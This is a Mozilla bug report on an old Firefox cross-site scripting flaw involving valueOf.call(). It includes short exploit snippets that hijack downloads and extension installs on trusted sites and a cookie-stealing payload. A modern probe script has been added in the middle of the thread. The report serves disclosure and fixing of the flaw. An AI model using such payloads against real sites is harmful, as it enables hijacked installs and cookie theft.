Bug 327194 - XSS by using .valueOf.call() or .valueOf.apply()
Status: RESOLVED FIXED
Whiteboard: [sg:high]
Keywords: fixed1.7.13
Product: Core
Classification: Components
Component: Security
Version: 1.7 Branch
Platform: x86 Windows XP
Importance: -- normal
Target Milestone: ---
Assigned To: Daniel Veditz [:dveditz]
QA Contact: David Keeler [:keeler]
Depends on: 290488
Reported: 2006-02-14 13:48 PST by moz_bug_r_a4
Modified: 2007-04-01 15:36 PDT
CC: 6 users
Flags: dveditz: blocking1.7.13+; dveditz: blocking-aviary1.0.8+; bob: in-testsuite?

Attachments
  testcase 1 - hijacks software download process on Apple QuickTime download page (625 bytes, text/html) - 2006-02-14 13:51 PST, moz_bug_r_a4
  extension to be installed (1.68 KB, application/x-xpinstall) - 2006-02-14 13:53 PST, moz_bug_r_a4
  testcase 2 - hijacks extension install process on https://addons.mozilla.org/ (910 bytes, text/html) - 2006-02-14 13:56 PST, moz_bug_r_a4
  exploitable page (138 bytes, text/html) - 2006-02-14 13:57 PST, moz_bug_r_a4
  testcase 3 - runs script in the context of other site (578 bytes, text/html) - 2006-02-14 14:00 PST, moz_bug_r_a4
  testcase 4 - shows return values of obj.valueOf.call() and obj.valueOf.apply() (1.10 KB, text/html) - 2006-02-18 00:36 PST, moz_bug_r_a4

Description moz_bug_r_a4 2006-02-14 13:48:44 PST
fx 1.0.x and suite 1.7.x are affected.  fx 1.5 and trunk are not affected.

On fx 1.0.x and suite 1.7.x, when calling obj.valueOf.call() or
obj.valueOf.apply() without an argument, the return value is valueOf's __parent__,
which is Object.prototype.  On fx 1.5 and trunk, the return value is the global
object since Bug 290488 was fixed.

There are ways to access another site's objects (e.g. otherWin.focus,
otherWin.history), thus an attacker can access another site's Object.prototype
(e.g. otherWin.focus.valueOf.call()).

For example:

An attacker could hijack the software download process on a trusted site.

  Exploitable page:
  <script>
  function download() {
	...
  }
  </script>
  <a href="#" onclick="return download()">Download Now</a>

  Attacker:
  w = open(Exploitable page);
  o = w.focus.valueOf.call();
  o.download = function() { w.location = MALICIOUS_EXE_URL; return false; };


An attacker could hijack the extension install process on https://addons.mozilla.org/.

  https://addons.mozilla.org/:
  <a href="..." onclick="return install(event,'Extension Name', '../images/default.png');">Install Now</a>

  Attacker:
  w = open(Exploitable page);
  o = w.focus.valueOf.call();
  o.install = function install(aEvent, extName, iconURL) {
    var params = new Array();
    params[extName] = {
      URL: MALICIOUS_EXTENSION_URL,
      IconURL: iconURL,
      toString: function () { return this.URL; }
    };
    InstallTrigger.install(params);
    return false;
  };


An attacker could run script in the context of another site.

  Exploitable page:
  <a href="javascript:void(0)" onclick="alert(location)">aaa</a>

  Attacker:
  w = open(Exploitable page);
  o = w.focus.valueOf.call();
  o.alert = o.eval;
  o.location = MALICIOUS_CODE; // e.g. steal cookie
Comment 1 moz_bug_r_a4 2006-02-14 13:51:02 PST
Created attachment 211898
testcase 1 - hijacks software download process on Apple QuickTime download page
Comment 2 moz_bug_r_a4 2006-02-14 13:53:22 PST
Created attachment 211899
extension to be installed
Comment 3 moz_bug_r_a4 2006-02-14 13:56:30 PST
Created attachment 211900
testcase 2 - hijacks extension install process on https://addons.mozilla.org/
Comment 4 moz_bug_r_a4 2006-02-14 13:57:40 PST
Created attachment 211901
exploitable page
Comment 5 moz_bug_r_a4 2006-02-14 14:00:53 PST
Created attachment 211903
testcase 3 - runs script in the context of other site

Load this testcase from https://recluse.mozilla.org/show_bug.cgi?id=327194#c4
Comment 6 Daniel Veditz [:dveditz] 2006-02-14 17:38:44 PST
I can confirm this on 1.0.7, but it is fixed in 1.0.8 nightlies. Most likely by the "split-window alternative" fix bug 316589
Comment 7 moz_bug_r_a4 2006-02-14 19:46:56 PST
I can confirm this on:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214

I think "split-window alternative" does not fix this.
Comment 8 Daniel Veditz [:dveditz] 2006-02-16 14:24:23 PST
Don't know what mrbkap and I were testing Tuesday, but with a 20060216 Firefox 1.0.8 build I can reproduce all these testcases. Clearing "fixed" keywords.
Comment 9 Daniel Veditz [:dveditz] 2006-02-16 15:24:36 PST
I can also reproduce in 2/7 (right after bug 316589 landed), 2/11 and 2/13

I have no clue why my 2/14 debug build was immune, if I didn't have witnesses I would think I was imagining it.
Comment 10 Daniel Veditz [:dveditz] 2006-02-16 15:31:31 PST
The patch from bug 290488 fixes this.
Comment 11 Daniel Veditz [:dveditz] 2006-02-16 15:47:15 PST
patch from bug 290488 checked into aviary101/moz17 branches
Comment 12 Marcia Knous [:marcia - use ni] 2006-02-17 15:32:04 PST
Using Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060217 Firefox/1.0.8, I can confirm that Testcase 1 and Testcase 2 are fixed.  When I try to run Testcase 3 the browser gets in a weird state and I get a not found error. If it is good enough to verify with just the two testcases, then I will add the keyword.

Using Mozilla 1.7.13 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060217, Testcase 1 is okay. Unable to run Testcase 2. Testcase 3 behaves the same way as it does in 1.0.8.
Comment 13 moz_bug_r_a4 2006-02-18 00:32:49 PST
(In reply to comment #12)
> When I try to run Testcase 3 the browser gets in a weird state and i get a
> not found error. If is good enough to verify with just the two testcases,
> then I will add the keyword.

The fix makes w.focus.valueOf.call() return w instead of Object.prototype in w.
Thus, testcase 3 ends up loading the following url, when evaluating
|o.location = code;|.

https://recluse.mozilla.org/window.alert('cookie:%20'%20+%20document.cookie);

This is why you got a not found error.
Comment 14 moz_bug_r_a4 2006-02-18 00:36:07 PST
Created attachment 212299
testcase 4 - shows return values of obj.valueOf.call() and obj.valueOf.apply()

If the return values are *not* Object.prototype, none of the exploits in this bug work.
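Added example, not part of the bug report or of testcase 4: a regression-style probe in the spirit of testcase 4 that calls obj.valueOf via .call() and .apply() with no this argument and classifies the result. The dangerous outcome, the one the description relies on, is getting back an object that sits on the probed object's own prototype chain (Object.prototype); the fixed 1.0.8/1.7.13 behaviour described in comment 13 returns the global object instead, and a modern ES5+ engine such as Node.js throws a TypeError because Object.prototype.valueOf rejects an undefined this. A second window is needed to reproduce the actual cross-site access, which an offline script cannot do, so the vulnerable behaviour is simulated with an object whose valueOf unconditionally hands back Object.prototype. The function names and the report shape are my own.

```javascript
// Walk obj's prototype chain and report whether `candidate` is one of its
// prototypes. A valueOf() result that lands here means a prototype object
// shared by every object of that realm has been handed out, which is the
// condition the exploits in this bug depend on.
function isOnPrototypeChain(candidate, obj) {
  for (let p = Object.getPrototypeOf(obj); p !== null; p = Object.getPrototypeOf(p)) {
    if (p === candidate) return true;
  }
  return false;
}

// Invoke obj.valueOf with no `this` via .call() or .apply() and classify
// what comes back:
//   'throws'           - ES5+ engines: TypeError from ToObject(undefined)
//   'global'           - the fixed 1.7.13 / 1.0.8 behaviour (comment 13)
//   'Object.prototype' - the vulnerable behaviour this bug describes
//   'other'            - anything else
function probeValueOf(obj, how) {
  const fn = obj.valueOf;
  let result;
  try {
    result = how === 'apply' ? fn.apply() : fn.call();
  } catch (e) {
    return { outcome: 'throws', error: e.constructor.name, leaksPrototype: false };
  }
  const isObject = result !== null && (typeof result === 'object' || typeof result === 'function');
  const leaksPrototype = isObject && isOnPrototypeChain(result, obj);
  let outcome = 'other';
  if (leaksPrototype) outcome = 'Object.prototype';
  else if (result === globalThis) outcome = 'global';
  return { outcome, leaksPrototype };
}

// Probe a function (functions inherit valueOf from Object.prototype, exactly
// like `w.focus` in the report) and a plain object, both ways.
function runProbes() {
  const subjects = { fn: function focus() {}, obj: {} };
  const report = {};
  for (const [name, subject] of Object.entries(subjects)) {
    for (const how of ['call', 'apply']) {
      report[`${name}.valueOf.${how}()`] = probeValueOf(subject, how);
    }
  }
  return report;
}

function anyPrototypeLeak(report) {
  return Object.values(report).some(r => r.leaksPrototype);
}

// Constructed stand-in for the vulnerable builds: a valueOf that ignores its
// `this` and returns Object.prototype, as the report says the 1.0.x / 1.7.x
// engines did. Used only to show that the probe flags that case.
function simulatedVulnerableObject() {
  return { valueOf() { return Object.prototype; } };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runProbes());
  console.log(probeValueOf(simulatedVulnerableObject(), 'call'));
}
```

Under Node.js every entry of runProbes() reports 'throws' with a TypeError and anyPrototypeLeak() is false, while the simulated object is flagged with outcome 'Object.prototype'. The same probe dropped into an HTML page would show 'global' on the fixed branches from this bug.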
Comment 15 Jay Patel [:jay] 2006-02-20 16:53:01 PST
v.fixed on 1.0.1 Aviary branch with Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060220 Firefox/1.0.8, all testcases seem to pass.
Comment 16 Marcia Knous [:marcia - use ni] 2006-02-21 15:59:11 PST
Just to clarify on the Mozilla suite side, Testcase 2 does pass for the suite. In my earlier testing I noted that the test case did not pass.

(In reply to comment #12)
> Using Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060217
> Firefox/1.0.8, I can confirm that Testcase 1 and Testcase 2 are fixed.  When I
> try to run Testcase 3 the browser gets in a weird state and i get a not found
> error. If is good enough to verify with just the two testcases, then I will add
> the keyword.
> 
> Using Mozilla 1.7.13 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13)
> Gecko/20060217, Testcase 1 is okay. Unable to run Testcase 2. Testcase 3
> behaves the same way as it does in 1.0.8.